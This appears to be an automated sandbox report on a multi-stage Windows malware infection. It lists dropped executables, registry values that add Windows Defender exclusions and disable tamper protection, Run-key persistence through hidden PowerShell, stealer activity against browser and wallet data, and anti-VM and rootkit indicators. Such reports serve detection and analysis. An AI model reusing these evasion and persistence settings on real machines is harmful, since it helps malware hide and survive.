N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2CQ7657.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3zj66Wk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4ST961YO.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\5tZ8WP7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6If0Yv8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3E1D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3EE9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TM0pC3TM.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\YD6bx5XP.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Dk37rF7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4322.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\442C.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4612.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Jf821dM.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\EAA0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ED12.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\EFF1.exe N/A
N/A N/A C:\Windows\SysWOW64\forfiles.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kos2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\set16.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSF2C7.tmp\Install.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\K.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-SRS6D.tmp\is-U2MH6.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS73.tmp\Install.exe N/A
N/A N/A C:\Program Files (x86)\MyBurn\MyBurn.exe N/A
N/A N/A C:\Program Files (x86)\MyBurn\MyBurn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\28C5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3028.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\fydFwya.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Windows\windefender.exe N/A
N/A N/A C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
N/A N/A C:\Windows\windefender.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Unexpected DNS network traffic destination

Description Indicator Process Target
Destination IP 51.159.66.125 N/A N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\31839b57a4f11171d6abc8bbc4451ee4.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\442C.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\e82947097dd2700b1d14eb33d3de85751a7786332b5c657824792cc1941e1eae.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\va5Ca30.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TM0pC3TM.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mP9Sj06.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\YD6bx5XP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\3E1D.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000\Software\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\ED12.exe'\"" C:\Users\Admin\AppData\Local\Temp\ED12.exe N/A

Checks installed software on the system

discovery

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A

Legitimate hosting services abused for malware hosting/C2

Manipulates WinMonFS driver

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMonFS C:\Windows\rss\csrss.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8C0A4A9E1CEFEB34D84E7975A8A5D28F C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_07142A81A102242D09FF624B465962F7 C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_8E9F8DBF10736410A01753CD3E271280 C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\7zS73.tmp\Install.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_3177CE6CD1B3852A6EC841765B1A16FB C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8C0A4A9E1CEFEB34D84E7975A8A5D28F C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\fydFwya.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_07142A81A102242D09FF624B465962F7 C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_3177CE6CD1B3852A6EC841765B1A16FB C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_8E9F8DBF10736410A01753CD3E271280 C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\fydFwya.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat C:\Windows\SysWOW64\rundll32.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\MyBurn\MyBurn.exe C:\Users\Admin\AppData\Local\Temp\is-SRS6D.tmp\is-U2MH6.tmp N/A
File opened for modification C:\Program Files (x86)\MyBurn\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-SRS6D.tmp\is-U2MH6.tmp N/A
File created C:\Program Files (x86)\KrPQunXfXpAVC\oLySDfI.xml C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File created C:\Program Files (x86)\MyBurn\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-SRS6D.tmp\is-U2MH6.tmp N/A
File created C:\Program Files (x86)\MyBurn\Sounds\is-I5B8T.tmp C:\Users\Admin\AppData\Local\Temp\is-SRS6D.tmp\is-U2MH6.tmp N/A
File created C:\Program Files (x86)\MyBurn\is-18LTF.tmp C:\Users\Admin\AppData\Local\Temp\is-SRS6D.tmp\is-U2MH6.tmp N/A
File created C:\Program Files\Google\Libs\WR64.sys C:\Program Files\Google\Chrome\updater.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File created C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR\WCcSaDo.dll C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File created C:\Program Files (x86)\MyBurn\is-P5G7R.tmp C:\Users\Admin\AppData\Local\Temp\is-SRS6D.tmp\is-U2MH6.tmp N/A
File created C:\Program Files (x86)\MyBurn\is-NV6JO.tmp C:\Users\Admin\AppData\Local\Temp\is-SRS6D.tmp\is-U2MH6.tmp N/A
File created C:\Program Files (x86)\oVhJPNkDU\ucUuRll.xml C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File created C:\Program Files (x86)\DlbZONUGhjVU2\VbPWRlrzUgMMz.dll C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File created C:\Program Files (x86)\MyBurn\Sounds\is-S5CE8.tmp C:\Users\Admin\AppData\Local\Temp\is-SRS6D.tmp\is-U2MH6.tmp N/A
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
File created C:\Program Files (x86)\DlbZONUGhjVU2\kvnvOro.xml C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File created C:\Program Files (x86)\MyBurn\is-LG499.tmp C:\Users\Admin\AppData\Local\Temp\is-SRS6D.tmp\is-U2MH6.tmp N/A
File created C:\Program Files (x86)\MyBurn\is-L77OA.tmp C:\Users\Admin\AppData\Local\Temp\is-SRS6D.tmp\is-U2MH6.tmp N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File created C:\Program Files (x86)\KrPQunXfXpAVC\qMcUMgN.dll C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File created C:\Program Files (x86)\MyBurn\is-2DQPN.tmp C:\Users\Admin\AppData\Local\Temp\is-SRS6D.tmp\is-U2MH6.tmp N/A
File created C:\Program Files (x86)\MyBurn\is-5CGJN.tmp C:\Users\Admin\AppData\Local\Temp\is-SRS6D.tmp\is-U2MH6.tmp N/A
File created C:\Program Files (x86)\oVhJPNkDU\bWlzgM.dll C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File created C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR\PSUhcLe.xml C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File created C:\Program Files (x86)\GpfcWYRxKqUn\LphEmHi.dll C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\bwpFiyeZPJPVdaMxTt.job C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\Tasks\GyWbuVQzPmDmgkCMH.job C:\Windows\SysWOW64\schtasks.exe N/A
File opened for modification C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\Tasks\HKFMMLmWpeGdwIqGl.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File opened for modification C:\Windows\Wanugegulaho milorahaxah mosuraxupib rusekutokefod bopujune C:\Users\Admin\AppData\Local\Temp\EFF1.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
